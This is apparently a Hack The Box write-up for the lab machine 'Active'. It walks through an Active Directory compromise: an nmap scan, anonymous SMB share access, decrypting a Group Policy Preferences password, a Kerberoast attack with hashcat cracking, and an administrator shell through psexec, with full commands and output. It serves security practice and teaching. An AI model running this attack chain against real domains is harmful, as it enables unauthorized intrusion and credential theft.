HI all. Let dive into this box to practice some active directory attack
I started enumeration with nmap.
nmap -sC -sV -oA nmap/initial 10.10.10.100
# Nmap 7.91 scan initiated Sat Feb 27 17:43:55 2021 as: nmap -sC -sV -oA nmap/initial 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.14s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-02-27 22:44:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-02-27T22:45:12
|_ start_date: 2021-02-27T09:53:16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 27 17:45:21 2021 -- 1 IP address (1 host up) scanned in 85.55 seconds
I have lots of ports to enumerate. Most of ports seems to be part of active directory set up. I look for hacktricks cheat sheet. From nmap scan I know that server is probably windows 2008 R2 and domain name is active.htb. I start with some low hanging fruit and I enumerate smb first.
smbmap -u "" -p "" -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
I can see Replication share. I use old smbclient to look what is inside this share. I tried to used smbmap with -R for recursion but few folders did ot sow properly
smbclient -U "%" //10.10.10.100/Replication
Try "help" to get a list of possible commands.
smb: \>
One of folder contain Groups.xml file. I downloaded and look into it.
cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
File contain username and cpassword. Kali has utility called gpp-decrypt to decrypt this password. With this account I can look into try enumerate SMB as well as I do have credentials now. I was able to get user flag but could not authenticate. With this account I can start kerberoast attack. I get impacket script from github and I run GetUserSPNs.py
python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -outputfile ~/boxes/Active/kerbroast
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
in our file we have hash for administrator. Lets use hashcat do see if I can get password.
hashcat -a 0 -m 13100 kerbroast /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c1df41c85466776eda8c7cba0bdb0322$73566205dc47d71a7b62dc44b073635ca0e2eaf9684da6a0bb4d83b6d026b9ae3df1bebc960f8fc5510ff104d9b5a6b4e3d273d37e773450f0b6f08d5a6ef6f872781b1886b903ab28feabdab5bba17608978009a579eed97123a71b904d9a0ef4b6e999395ff580e73d803a7b621862bfd406ddb274ade11576947b72947b4fc5d061a4a08329d09c1e9037c2398a0a18b44a4653fa11ecf7af7bf9a1e7c8bc15ea855c40b1d089207b3a466fab3d7cc677a4925e2c57272bf24a70f433af536e157c5b19eb2c05e2ea18aae44f5112973df959bdc584db7b684a49a8f23a02abd1503681b25e7514c325af3a5c80c9b376cb897a4a94dbd7ca7898dd6dab0d9f1597bd3416fb4a37781e49e39ea0e709986005651bf416065952ab691724c8e2ac5bea56b6cad8985e8af97171f6d76c8c73bafc77b768c923218c9b143eac225c54c95e430d74cfc8824f7a31cd5746c68d085cdedc77d15d3a2f0f7873657795c2b580b087edb070e9c5e819faea7eb34040ada7ebbd00612b1b13f3e182776f95f9319ff9f232d01d232758303757fe606a24887b75f80e7935bd8522bf268b496b39634678f465f533d5307988222d0a1d3e5ef9bc4735bd3b3f17bdba9e1d69757dbf364dc87d667adaa156e726a071e979485676c6b9d54a4b158b0998742ea5cd65e0d7f714db1dc83e2b28eea6d54b6b0bb75c903c47b0dbe47ebb1e5c49c135fc960e52455f5b65aa886754dbdc243d2bc821e469293266ddc70bf9405066bead583e79dfe2a34d2dfdb4de00ec8ecd3d2561945de0a88cd3775fea79cf96d157eb417b01d3f4b3acfc35dde155bbfc6a99ef93916cf7ee4f780eac9186900b09cfaf3f02ece2ee769780bf48aead07147a6a5b5235f05c094306d2ca0d5bc7e5d892e1c60f290e99f296e7b8272f73469d9f41e835c1e43a23ac656620072a4c799f9f37b37d389b691c5529630827781abedd3c5e18a94e2cb77e4f1a777b797b4d2f46a56baa3f21ab5c50980edc42e51f9d4e3500aafcc3ef4e7cad79595824fdf2fb663478af90bc4a82dad00e1880f24cf8bb33f8e3683d89349c58ad536fff42f0b1da7afcac60170b3fd4d35a2367b8790f789dcccceb4f3848452a7bd3d246de5568e4c1e92b3d712e624b5d57cfce1fe28416510017bfb0136b65196f9273ebaa53b07d770033447057cda3020f67575ba875c5e218d9fb9c71ae49f1587319862e8dc49ab40d571f9cc61bae91753d:Ticketmaster1968
Now I can used psexec to get into machine as administrator
python3 psexec.py -dc-ip 10.10.10.100 active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file EevbEgPO.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service DbJs on 10.10.10.100.....
[*] Starting service DbJs.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
I hope you you enjoy to read this manual
Cheers in next one